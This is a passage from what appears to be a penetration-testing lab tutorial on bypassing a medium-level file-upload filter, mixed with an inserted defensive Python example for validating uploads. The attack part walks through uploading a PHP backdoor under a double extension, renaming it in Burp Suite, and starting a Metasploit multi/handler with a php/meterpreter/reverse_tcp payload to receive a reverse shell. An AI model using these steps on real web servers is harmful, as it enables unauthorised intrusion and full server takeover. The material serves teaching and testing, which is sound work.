Some web applications configured at a medium security level will only allow you to upload files with certain extensions, such as “.jpeg” and “.png.”
In other words, uploads are restricted to these extensions; anything else will not be accepted by the web server. To bypass this, we need to deceive the web server by submitting a file with multiple extensions.
In this example, we will try to upload the same malicious file we used previously but rename it to “image_file.php.jpeg.” It will appear to be a “.jpeg” file containing some data, but in reality it will be executed as a “.php” file on the application.
Before jumping to hands-on activity, let’s set the security level of the target web server to a medium.
To be successful in any web application attack, we need to be proficient with the “Burp Suite” tool. “Burp Suite” is a graphical tool designed for testing web application security and is intended to be a comprehensive platform for web application security checks. Besides core functionality such as the scanner, proxy server, and intruder, the tool also contains more advanced components such as the repeater, spider, comparer, decoder, extender, and sequencer.
Burp Proxy lets manual testers intercept all requests and responses between the browser and the target application, even when HTTPS is being used. We can view, edit, or drop individual messages to manipulate the server-side or client-side components of the application.
Kali Linux comes with “Burp Suite” preinstalled; go to the application menu and search for it. Once you have located it, double-click it to start the tool. To intercept all requests and responses between the browser and the server, we need to make a small change to the browser’s proxy configuration and point it at Burp’s listening interface. To do so, first go to the “Proxy” tab of “Burp Suite,” and under the “Options” tab, locate the listening interface (address and port) and note it down.
Then open up your Firefox browser and go to the “General” settings.
Under the “Network Proxy” settings, select the “Manual proxy configuration” option and enter Burp’s interface address and port. Now our “Burp Suite” is ready to intercept all of the browser’s communications.
Let’s upload our malicious file with a double extension onto the web server.
Once you click on “Upload,” switch to “Burp Suite” to analyze the intercepted traffic. In Burp, click on the “Proxy” tab and go to the “Intercept” tab. Under the “Headers” tab, locate the filename “image_file.php.jpeg” and rename it to “image_file.php,” making sure that the filename stays within the quotation marks. Then click on the “Forward” button to let the upload request through.
As you can see in the image below, we have successfully uploaded our PHP file to a web server with a medium security level. To exploit it further, copy the path of the uploaded file and use it in the URL search box.
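As a defensive counterpoint to the upload check just bypassed, the following added example (not code from the original page) contrasts a check that trusts what the client sends (assumed here to be the Content-Type header, which renaming the filename in the proxy does not disturb) with server-side validation that keys only on the final extension, verifies the file’s magic bytes, and stores the file under a server-generated name. The function names and the signature table are assumptions for illustration.

```python
import os
import secrets

# Allowlisted extensions and the file signature ("magic bytes") each must start with.
# Constructed table for this example; extend it for other image types you accept.
ALLOWED = {
    "jpeg": b"\xff\xd8\xff",
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}


def weak_check(content_type: str) -> bool:
    """The kind of check the proxy trick defeats: it trusts the client-supplied
    Content-Type, which stays "image/jpeg" even after the filename is changed
    from image_file.php.jpeg to image_file.php in the intercepted request."""
    return content_type in ("image/jpeg", "image/png")


def validate_upload(client_filename: str, data: bytes):
    """Return (server_filename, None) on success or (None, reason) on rejection.
    The client filename is treated as an untrusted hint, never as the name on disk."""
    # Strip any directory components the client may have included.
    base = os.path.basename(client_filename.replace("\\", "/"))
    # Only the final extension counts: "image_file.php.jpeg" -> "jpeg", "image_file.php" -> "php".
    _, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED:
        return None, f"extension {ext!r} is not allowed"
    # The bytes must actually look like the claimed image type.
    if not data.startswith(ALLOWED[ext]):
        return None, "content does not match the signature for ." + ext
    # Never reuse the client name: a random server-generated name guarantees that
    # no part of the original name (such as ".php") ever reaches the filesystem.
    return f"{secrets.token_hex(16)}.{ext}", None
```

Storing under an allowlisted extension only helps if the web server never executes uploaded content; keep the upload directory outside the document root or with script execution disabled.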
Before doing that, we need to start the multi-handler and listen for an incoming connection.
Example:
    msf5 > use exploit/multi/handler
    msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
    msf5 exploit(multi/handler) > set lhost 10.10.10.8
    msf5 exploit(multi/handler) > set lport 4444
    msf5 exploit(multi/handler) > exploit
Now we can paste the path and run the backdoor on the server-side.
Once our malicious file is executed, the attacker’s computer will receive a reverse shell connection with full root control.